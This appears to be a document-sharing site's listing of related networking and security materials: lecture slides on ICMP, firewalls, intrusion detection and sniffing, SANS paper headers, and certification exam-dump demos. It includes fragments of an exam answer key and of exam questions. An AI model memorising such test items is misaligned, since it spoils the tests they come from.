Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University Why ICMP? UDP and TDP are not designed to report errors Provide a simple way to report errors between

More information

Host Identity Sources

Host Identity Sources The following topics provide information on host identity sources: Overview: Host Data Collection, on page 1 Determining Which Host Operating Systems the System Can Detect, on page 2 Identifying Host Operating

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Network Security Laboratory 23 rd May STATEFUL FIREWALL LAB

Network Security Laboratory 23 rd May STATEFUL FIREWALL LAB Network Security Laboratory 23 rd May 2016. STATEFUL FIREWALL LAB 1 CONTENTS INTRODUCTION I. What is Stateful Firewall II. Difference between Stateful and Stateless III. Example of Stateful firewall IV.

More information

Author: Prof Bill Buchanan

Author: Prof Bill Buchanan Data Loss Prevention 2. Data in-motion Magic Numbers/Discriminators. Detecting from network traffic. Regular Expressions. Extracting Content from traces. Converted formats. http://asecuritysite.com/dlp

More information

Chapter 10: Denial-of-Services

Chapter 10: Denial-of-Services Chapter 10: Denial-of-Services Technology Brief This chapter, "Denial-of-Service" is focused on DoS and Distributed Denial-of-Service (DDOS) attacks. This chapter will cover understanding of different

More information

Muhammad Farooq-i-Azam CHASE-2006 Lahore

Muhammad Farooq-i-Azam CHASE-2006 Lahore Muhammad Farooq-i-Azam CHASE-2006 Lahore Overview Theory Existing Sniffers in action Switched Environment ARP Protocol and Exploitation Develop it yourself 2 Network Traffic Computers and network devices

More information

Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y / P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A

Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y / P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y 2 01 6 / 2 017 P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A Slides are based on slides by Dr Lawrie Brown (UNSW@ADFA) for Computer

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Intrusion Detection Systems Intrusion Actions aimed at compromising the security of the target (confidentiality, integrity, availability of computing/networking

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

RS 232 PINOUTS. 1. We use RJ12 for all of our RS232 interfaces (Link-2-Modbus & Link-2-PC- Serial/RS232). The diagram below shows our pin out.

RS 232 PINOUTS. 1. We use RJ12 for all of our RS232 interfaces (Link-2-Modbus & Link-2-PC- Serial/RS232). The diagram below shows our pin out. RS 232 PINOUTS 1. We use RJ12 for all of our RS232 interfaces (Link-2-Modbus & Link-2-PC- Serial/RS232). The diagram below shows our pin out. 2. A DB9 Female to RJ12 Female Serial/Terminal Modular Adaptor

More information

Common Network Attacks

Common Network Attacks Common Network Attacks David J. Marchette dmarchette@gmail.com Common Network Attacks p.1/96 Outline Some Common Attacks SHADOW EMERALD ADAM Utilities Common Network Attacks p.2/96 Terminology Active.

More information

July Registration of a Cyrillic Character Set. Status of this Memo

July Registration of a Cyrillic Character Set. Status of this Memo Network Working Group Request for Comments: 1489 A. Chernov RELCOM Development Team July 1993 Status of this Memo Registration of a Cyrillic Character Set This memo provides information for the Internet

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

SE 4C03 Winter Final Examination Answer Key. Instructor: William M. Farmer

SE 4C03 Winter Final Examination Answer Key. Instructor: William M. Farmer SE 4C03 Winter 2003 Final Examination Answer Key Instructor: William M. Farmer (1) [2 pts.] Both the source and destination IP addresses are used to route IP datagrams. Is this statement true or false?

More information

IDS: Signature Detection

IDS: Signature Detection IDS: Signature Detection Idea: What is bad, is known What is not bad, is good Determines whether a sequence of instructions being executed is known to violate the site security policy Signatures: Descriptions

More information

Secret Key Systems (block encoding) Encrypting a small block of text (say 64 bits) General considerations for cipher design:

Secret Key Systems (block encoding) Encrypting a small block of text (say 64 bits) General considerations for cipher design: Secret Key Systems (block encoding) Encrypting a small block of text (say 64 bits) General considerations for cipher design: Secret Key Systems (block encoding) Encrypting a small block of text (say 64

More information

Syllabus: The syllabus is broadly structured as follows:

Syllabus: The syllabus is broadly structured as follows: Syllabus: The syllabus is broadly structured as follows: SR. NO. TOPICS SUBTOPICS 1 Foundations of Network Security Principles of Network Security Network Security Terminologies Network Security and Data

More information

Exam4Tests. Latest exam questions & answers help you to pass IT exam test easily

Exam4Tests.   Latest exam questions & answers help you to pass IT exam test easily Exam4Tests http://www.exam4tests.com Latest exam questions & answers help you to pass IT exam test easily Exam : CEH-001 Title : Certified Ethical Hacker (CEH) Vendor : GAQM Version : DEMO 1 / 9 Get Latest

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Technical Specification. Third Party Control Protocol. AV Revolution

Technical Specification. Third Party Control Protocol. AV Revolution Technical Specification Third Party Control Protocol AV Revolution Document AM-TS-120308 Version 1.0 Page 1 of 31 DOCUMENT DETAILS Document Title: Technical Specification, Third Party Control Protocol,

More information

Intrusion Detection. What is Intrusion Detection

Intrusion Detection. What is Intrusion Detection Intrusion Detection 1 What is Intrusion Detection We are referering to the act of detecting an unauthorized intrusion by a computer on a Network. Attemp to compromise or otherwise do harm, to other Network

More information

Course Contents. The TCP/IP protocol Stack

Course Contents. The TCP/IP protocol Stack Course Contents PART 1 Overview and Introduction PART 2 Communication Reference Models PART 3 Data Communication Fundamentals and Physical Layer PART 4 Datalink Layer and Emerging Network Technologies

More information

Security principles Host security

Security principles Host security Security principles Host security These materials are licensed under the Creative Commons Attribution-Noncommercial 3.0 Unported license (http://creativecommons.org/licenses/by-nc/3.0/) Host Security:

More information

ID: Cookbook: browseurl.jbs Time: 19:37:50 Date: 11/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 19:37:50 Date: 11/05/2018 Version: ID: 59176 Cookbook: browseurl.jbs Time: 19:37:50 Date: 11/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

TCPDUMP. Chia-Tien Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University

TCPDUMP. Chia-Tien Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University TCPDUMP Chia-Tien Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University PURPOSE Dump the content of a packet Analyze network traffic You have to be root to

More information

Exam Questions v8

Exam Questions v8 Exam Questions 412-79v8 EC-Council Certified Security Analyst https://www.2passeasy.com/dumps/412-79v8/ 1.Which of the following password cracking techniques is used when the attacker has some information

More information

Computer Forensics: Investigating Network Intrusions and Cybercrime, 2nd Edition. Chapter 2 Investigating Network Traffic

Computer Forensics: Investigating Network Intrusions and Cybercrime, 2nd Edition. Chapter 2 Investigating Network Traffic Computer Forensics: Investigating Network Intrusions and Cybercrime, 2nd Edition Chapter 2 Investigating Network Traffic Objectives After completing this chapter, you should be able to: Understand network

More information

Distributed Systems. 27. Firewalls and Virtual Private Networks Paul Krzyzanowski. Rutgers University. Fall 2013

Distributed Systems. 27. Firewalls and Virtual Private Networks Paul Krzyzanowski. Rutgers University. Fall 2013 Distributed Systems 27. Firewalls and Virtual Private Networks Paul Krzyzanowski Rutgers University Fall 2013 November 25, 2013 2013 Paul Krzyzanowski 1 Network Security Goals Confidentiality: sensitive

More information

Computer Security and Privacy

Computer Security and Privacy CSE P 590 / CSE M 590 (Spring 2010) Computer Security and Privacy Tadayoshi Kohno Thanks to Dan Boneh, Dieter Gollmann, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for

More information

Exam Number/Code: Exam Name: Computer Hacking. Version: Demo. Forensic Investigator.

Exam Number/Code: Exam Name: Computer Hacking. Version: Demo. Forensic Investigator. Exam Number/Code:312-49 Exam Name: Computer Hacking Forensic Investigator Version: Demo http://www.it-exams.com QUESTION NO: 1 When an investigator contacts by telephone the domain administrator or controller

More information

Service Cloaking and Anonymous Access; Combining Tor with Single Packet Authorization (SPA)

Service Cloaking and Anonymous Access; Combining Tor with Single Packet Authorization (SPA) Service Cloaking and Anonymous Access; Combining Tor with Single Packet Authorization (SPA) Michael Rash CTO, Solirix Inc. michael.rash@solirix.com http://www.cipherdyne.org/ DEF CON 08/05/2006 Agenda

More information

Fundamentals of Cryptography

Fundamentals of Cryptography Fundamentals of Cryptography Topics in Quantum-Safe Cryptography June 23, 2016 Part III Data Encryption Standard The Feistel network design m m 0 m 1 f k 1 1 m m 1 2 f k 2 2 DES uses a Feistel network

More information

The Traceroute Command in MPLS

The Traceroute Command in MPLS The Traceroute Command in MPLS Document ID: 26585 Contents Introduction Prerequisites Requirements Components Used Conventions Normal traceroute Command MPLS traceroute Command no mpls ip propagate ttl

More information

Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

GCIH. GIAC Certified Incident Handler.

GCIH. GIAC Certified Incident Handler. GIAC GCIH GIAC Certified Incident Handler TYPE: DEMO http://www.examskey.com/gcih.html Examskey GIAC GCIH exam demo product is here for you to test the quality of the product. This GIAC GCIH demo also

More information